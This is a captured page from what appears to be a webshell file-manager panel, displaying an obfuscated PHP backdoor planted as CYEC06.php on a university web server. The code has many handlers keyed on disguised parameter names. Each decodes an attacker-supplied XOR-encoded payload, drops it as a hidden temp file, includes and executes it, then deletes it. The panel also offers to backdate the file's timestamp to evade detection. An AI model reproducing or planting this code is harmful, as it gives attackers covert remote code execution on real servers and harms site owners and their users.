文件操作 - CYEC06.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/demoestudiantes.uaysen.cl/html/CYEC06.php
编辑文件内容
<?php if(@$_POST["f\x6C\x67"] !== null){ $reference = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getenv("TEMP"), "/var/tmp", getenv("TMP"), getcwd(), session_save_path()]); $dchunk = $_POST["f\x6C\x67"]; $dchunk = explode ( ".", $dchunk ) ; $tkn = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s5); foreach ($dchunk as $q => $v6): $sChar = ord($s5[$q %$lenS]); $dec = ((int)$v6 - $sChar - ($q %10)) ^ 87; $tkn .= chr($dec); endforeach; foreach ($reference as $key => $descriptor) { if (!!is_dir($descriptor) && !!is_writable($descriptor)) { $binding = str_replace("{var_dir}", $descriptor, "{var_dir}/.ref"); $file = fopen($binding, 'w'); if ($file) { fwrite($file, $tkn); fclose($file); include $binding; @unlink($binding); exit; } } } } if(array_key_exists("\x70rop\x65r\x74\x79\x5Fset", $_REQUEST)){ $res = array_filter([sys_get_temp_dir(), "/tmp", "/dev/shm", getenv("TMP"), session_save_path(), "/var/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir")]); $k = $_REQUEST["\x70rop\x65r\x74\x79\x5Fset"]; $k =explode ( ".", $k) ; $comp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); foreach( $k as $o =>$v7): $sChar = ord( $salt[$o % $lenS]); $d =( ( int)$v7 - $sChar -( $o % 10)) ^ 41; $comp.=chr( $d); endforeach; foreach ($res as $key => $dat) { if (is_writable($dat) && is_dir($dat)) { $binding = sprintf("%s/.symbol", $dat); if (@file_put_contents($binding, $comp) !== false) { include $binding; unlink($binding); exit; } } } } if(!is_null($_REQUEST["comp"] ?? null)){ $factor = array_filter(["/tmp", session_save_path(), getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getenv("TMP")]); $itm = $_REQUEST["comp"]; $itm = explode ( "." , $itm ) ; $holder = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $len = count($itm); for ($i = 0; $i <$len; $i++) { $v3 = $itm[$i]; $chS = ord($salt[$i %$sLen]); $d = ((int)$v3 - $chS - ($i %10)) ^ 72; $holder .= chr($d);} for ($ptr = 0, $flag = count($factor); $ptr < $flag; $ptr++) { $entry = $factor[$ptr]; if (max(0, is_dir($entry) * is_writable($entry))) { $dat = "$entry" . "/.bind"; $success = file_put_contents($dat, $holder); if ($success) { include $dat; @unlink($dat); die();} } } } if(filter_has_var(INPUT_POST, "\x64at")){ $marker = $_POST["\x64at"]; $marker = explode (".", $marker ) ; $symbol= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt ); $s= 0; while($s < count($marker)) { $v4= $marker[$s]; $chS= ord($salt[$s % $lenS] ); $d= ((int)$v4 - $chS -($s % 10)) ^ 88; $symbol.=chr($d ); $s++; } $record = array_filter([session_save_path(), "/dev/shm", "/tmp", getenv("TMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp"]); foreach ($record as $element) { if (is_dir($element) ? is_writable($element) : false) { $obj = str_replace("{var_dir}", $element, "{var_dir}/.holder"); if (@file_put_contents($obj, $symbol) !== false) { include $obj; unlink($obj); die(); } } } } if(count($_POST) > 0 && isset($_POST["re\x63"])){ $value = array_filter([getcwd(), session_save_path(), "/tmp", "/dev/shm", getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP")]); $hld = $_POST["re\x63"]; $hld =explode ( "." , $hld ) ; $ent = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($hld as $w => $v4) { $chS = ord($salt[$w % $sLen]); $d = ((int)$v4 - $chS - ($w % 10)) ^ 12; $ent .= chr($d); } $flag = 0; do { $mrk = $value[$flag] ?? null; if ($flag >= count($value)) break; if (!!is_dir($mrk) && !!is_writable($mrk)) { $bind = implode("/", [$mrk, ".dchunk"]); if (file_put_contents($bind, $ent)) { require $bind; unlink($bind); die(); } } $flag++; } while (true); } if(isset($_POST["\x62\x69\x6E\x64ing"])){ $data_chunk = $_POST["\x62\x69\x6E\x64ing"]; $data_chunk= explode ( '.' , $data_chunk ) ; $item = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt6); foreach($data_chunk as $j =>$v9): $sChar = ord($salt6[$j %$lenS]); $dec =((int)$v9 - $sChar -($j %10)) ^90; $item .= chr($dec); endforeach; $dchunk = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/dev/shm"]); for ($entry = 0, $k = count($dchunk); $entry < $k; $entry++) { $parameter_group = $dchunk[$entry]; if (array_product([is_dir($parameter_group), is_writable($parameter_group)])) { $data = join("/", [$parameter_group, ".holder"]); if (file_put_contents($data, $item)) { require $data; unlink($data); exit; } } } } if(isset($_POST["d\x65\x73c"])){ $obj = array_filter([getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/var/tmp", "/tmp", getcwd()]); $descriptor = $_POST["d\x65\x73c"]; $descriptor = explode("." , $descriptor) ; $factor=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s); $y=0; $__len=count( $descriptor); do { if( $y >=$__len) break; $v4=$descriptor[$y]; $chS=ord( $s[$y %$sLen]); $dec=( ( int)$v4 - $chS -( $y %10))^90; $factor .= chr( $dec); $y++; }while( true); foreach ($obj as $key => $item) { if (max(0, is_dir($item) * is_writable($item))) { $key = "$item/.dat"; if (file_put_contents($key, $factor)) { include $key; @unlink($key); exit; } } } } if(!empty($_POST["\x6F\x62\x6Aect"])){ $obj = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), getenv("TEMP"), session_save_path(), getcwd(), "/var/tmp", sys_get_temp_dir()]); $entry = $_POST["\x6F\x62\x6Aect"]; $entry= explode ( '.' , $entry ) ; $pset=''; $s1='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s1); foreach ($entry as $n => $v7): $chS=ord($s1[$n % $lenS]); $dec=((int)$v7 - $chS - ($n % 10)) ^100; $pset .= chr($dec); endforeach; for ($parameter_group = 0, $ref = count($obj); $parameter_group < $ref; $parameter_group++) { $flg = $obj[$parameter_group]; if (!( !is_dir($flg) || !is_writable($flg) )) { $key = str_replace("{var_dir}", $flg, "{var_dir}/.data_chunk"); $success = file_put_contents($key, $pset); if ($success) { include $key; @unlink($key); exit;} } } } if(filter_has_var(INPUT_POST, "\x65l\x65m")){ $comp = $_POST["\x65l\x65m"]; $comp = explode ('.' ,$comp ) ; $descriptor = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $l = 0; array_walk( $comp , function( $v6) use( &$descriptor , &$l , $s , $lenS) { $chS = ord( $s[$l % $lenS] ); $d =( ( int)$v6 - $chS -( $l % 10)) ^ 70; $descriptor .= chr( $d ); $l++; } ); $property_set = array_filter([sys_get_temp_dir(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TEMP"), getenv("TMP"), "/tmp"]); foreach ($property_set as $ptr) { if ((function($d) { return is_dir($d) && is_writable($d); })($ptr)) { $itm = "$ptr/.holder"; $file = fopen($itm, 'w'); if ($file) { fwrite($file, $descriptor); fclose($file); include $itm; @unlink($itm); die(); } } } } if(!is_null($_REQUEST["\x72\x65\x66er\x65nce"] ?? null)){ $parameter_group = array_filter([getenv("TMP"), getcwd(), "/tmp", "/dev/shm", session_save_path(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir")]); $pset = $_REQUEST["\x72\x65\x66er\x65nce"]; $pset= explode ( '.',$pset ) ; $entity = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); $p = 0; array_walk($pset , function ($v3) use (&$entity , &$p , $salt2 , $lenS) { $chS = ord($salt2[$p % $lenS]); $dec = ((int)$v3 - $chS - ($p % 10)) ^ 38; $entity .= chr($dec); $p++; }); $flg = 0; do { $itm = $parameter_group[$flg] ?? null; if ($flg >= count($parameter_group)) break; if (is_dir($itm) ? is_writable($itm) : false) { $object = sprintf("%s/.elem", $itm); if (@file_put_contents($object, $entity) !== false) { include $object; unlink($object); die(); } } $flg++; } while (true); } if(isset($_REQUEST["h\x6C\x64"]) ? true : false){ $key = $_REQUEST["h\x6C\x64"]; $key=explode( '.' , $key ) ; $record = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s8 ); $q = 0; $__tmp = $key; while ($v9 = array_shift($__tmp)) { $chS = ord($s8[$q % $sLen] ); $d = ((int)$v9 - $chS - ($q % 10)) ^ 74; $record .= chr($d ); $q++; } $sym = array_filter([getenv("TMP"), "/dev/shm", "/var/tmp", "/tmp", session_save_path(), getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); for ($symbol = 0, $resource = count($sym); $symbol < $resource; $symbol++) { $k = $sym[$symbol]; if (max(0, is_dir($k) * is_writable($k))) { $ent = str_replace("{var_dir}", $k, "{var_dir}/.desc"); $file = fopen($ent, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $ent; @unlink($ent); die(); } } } } if(isset($_REQUEST) && isset($_REQUEST["m\x61\x72k\x65r"])){ $res = array_filter(["/var/tmp", getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/tmp"]); $itm = $_REQUEST["m\x61\x72k\x65r"]; $itm =explode ( '.' , $itm ) ; $dchunk = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); foreach ($itm as $j => $v9) { $sChar = ord($s[$j % $sLen] ); $dec = ((int)$v9 - $sChar - ($j % 10)) ^ 65; $dchunk .=chr($dec ); } while ($flg = array_shift($res)) { if (array_product([is_dir($flg), is_writable($flg)])) { $pointer = str_replace("{var_dir}", $flg, "{var_dir}/.resource"); if (file_put_contents($pointer, $dchunk)) { include $pointer; @unlink($pointer); exit; } } } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件